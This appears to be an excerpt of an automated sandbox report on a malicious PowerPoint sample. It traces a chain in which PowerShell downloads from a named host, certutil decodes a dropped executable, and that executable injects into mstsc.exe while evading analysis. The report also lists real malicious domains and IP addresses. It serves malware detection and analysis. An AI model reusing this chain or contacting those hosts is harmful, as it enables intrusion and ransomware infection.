Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 281044  Sample: order.ppsx  Startdate: 28/05/2017  Architecture: WINDOWS  Score: 96

[Behavior graph image; process tree, signatures and network nodes recovered from the graph's node and edge labels]

  • POWERPNT.EXE (started from the sample)
    • Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
    • powershell.exe (started)
      • Signatures: Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca); System process connects to network (likely due to code injection or exploit)
      • DNS/IP: cccn.nl (46.21.169.110, port 80, TechnotopInternetBV, Netherlands); cccn.nl
      • wscript.exe (started)
        • Signatures: Uses certutil -decode; System process connects to network (likely due to code injection or exploit)
        • DNS/IP: 185.159.82.38, port 45000 (SkylineTelephone, unknown); signature: Detected TCP or UDP traffic on non-standard ports
        • certutil.exe (started); dropped: 484.exe, PE32
        • cmd.exe (started)
          • 484.exe (started)
            • Signatures: Found evasive API chain (may stop execution after checking mutex); Maps a DLL or memory area into another process; Writes to foreign memory regions
            • mstsc.exe (started)
              • Signatures: Found evasive API chain (may stop execution after checking mutex); Found stalling execution ending in API Sleep call; Sample execution stops while process was sleeping (likely an evasion)
        • cmd.exe (started)

Yara Overview

No Yara matches

Screenshot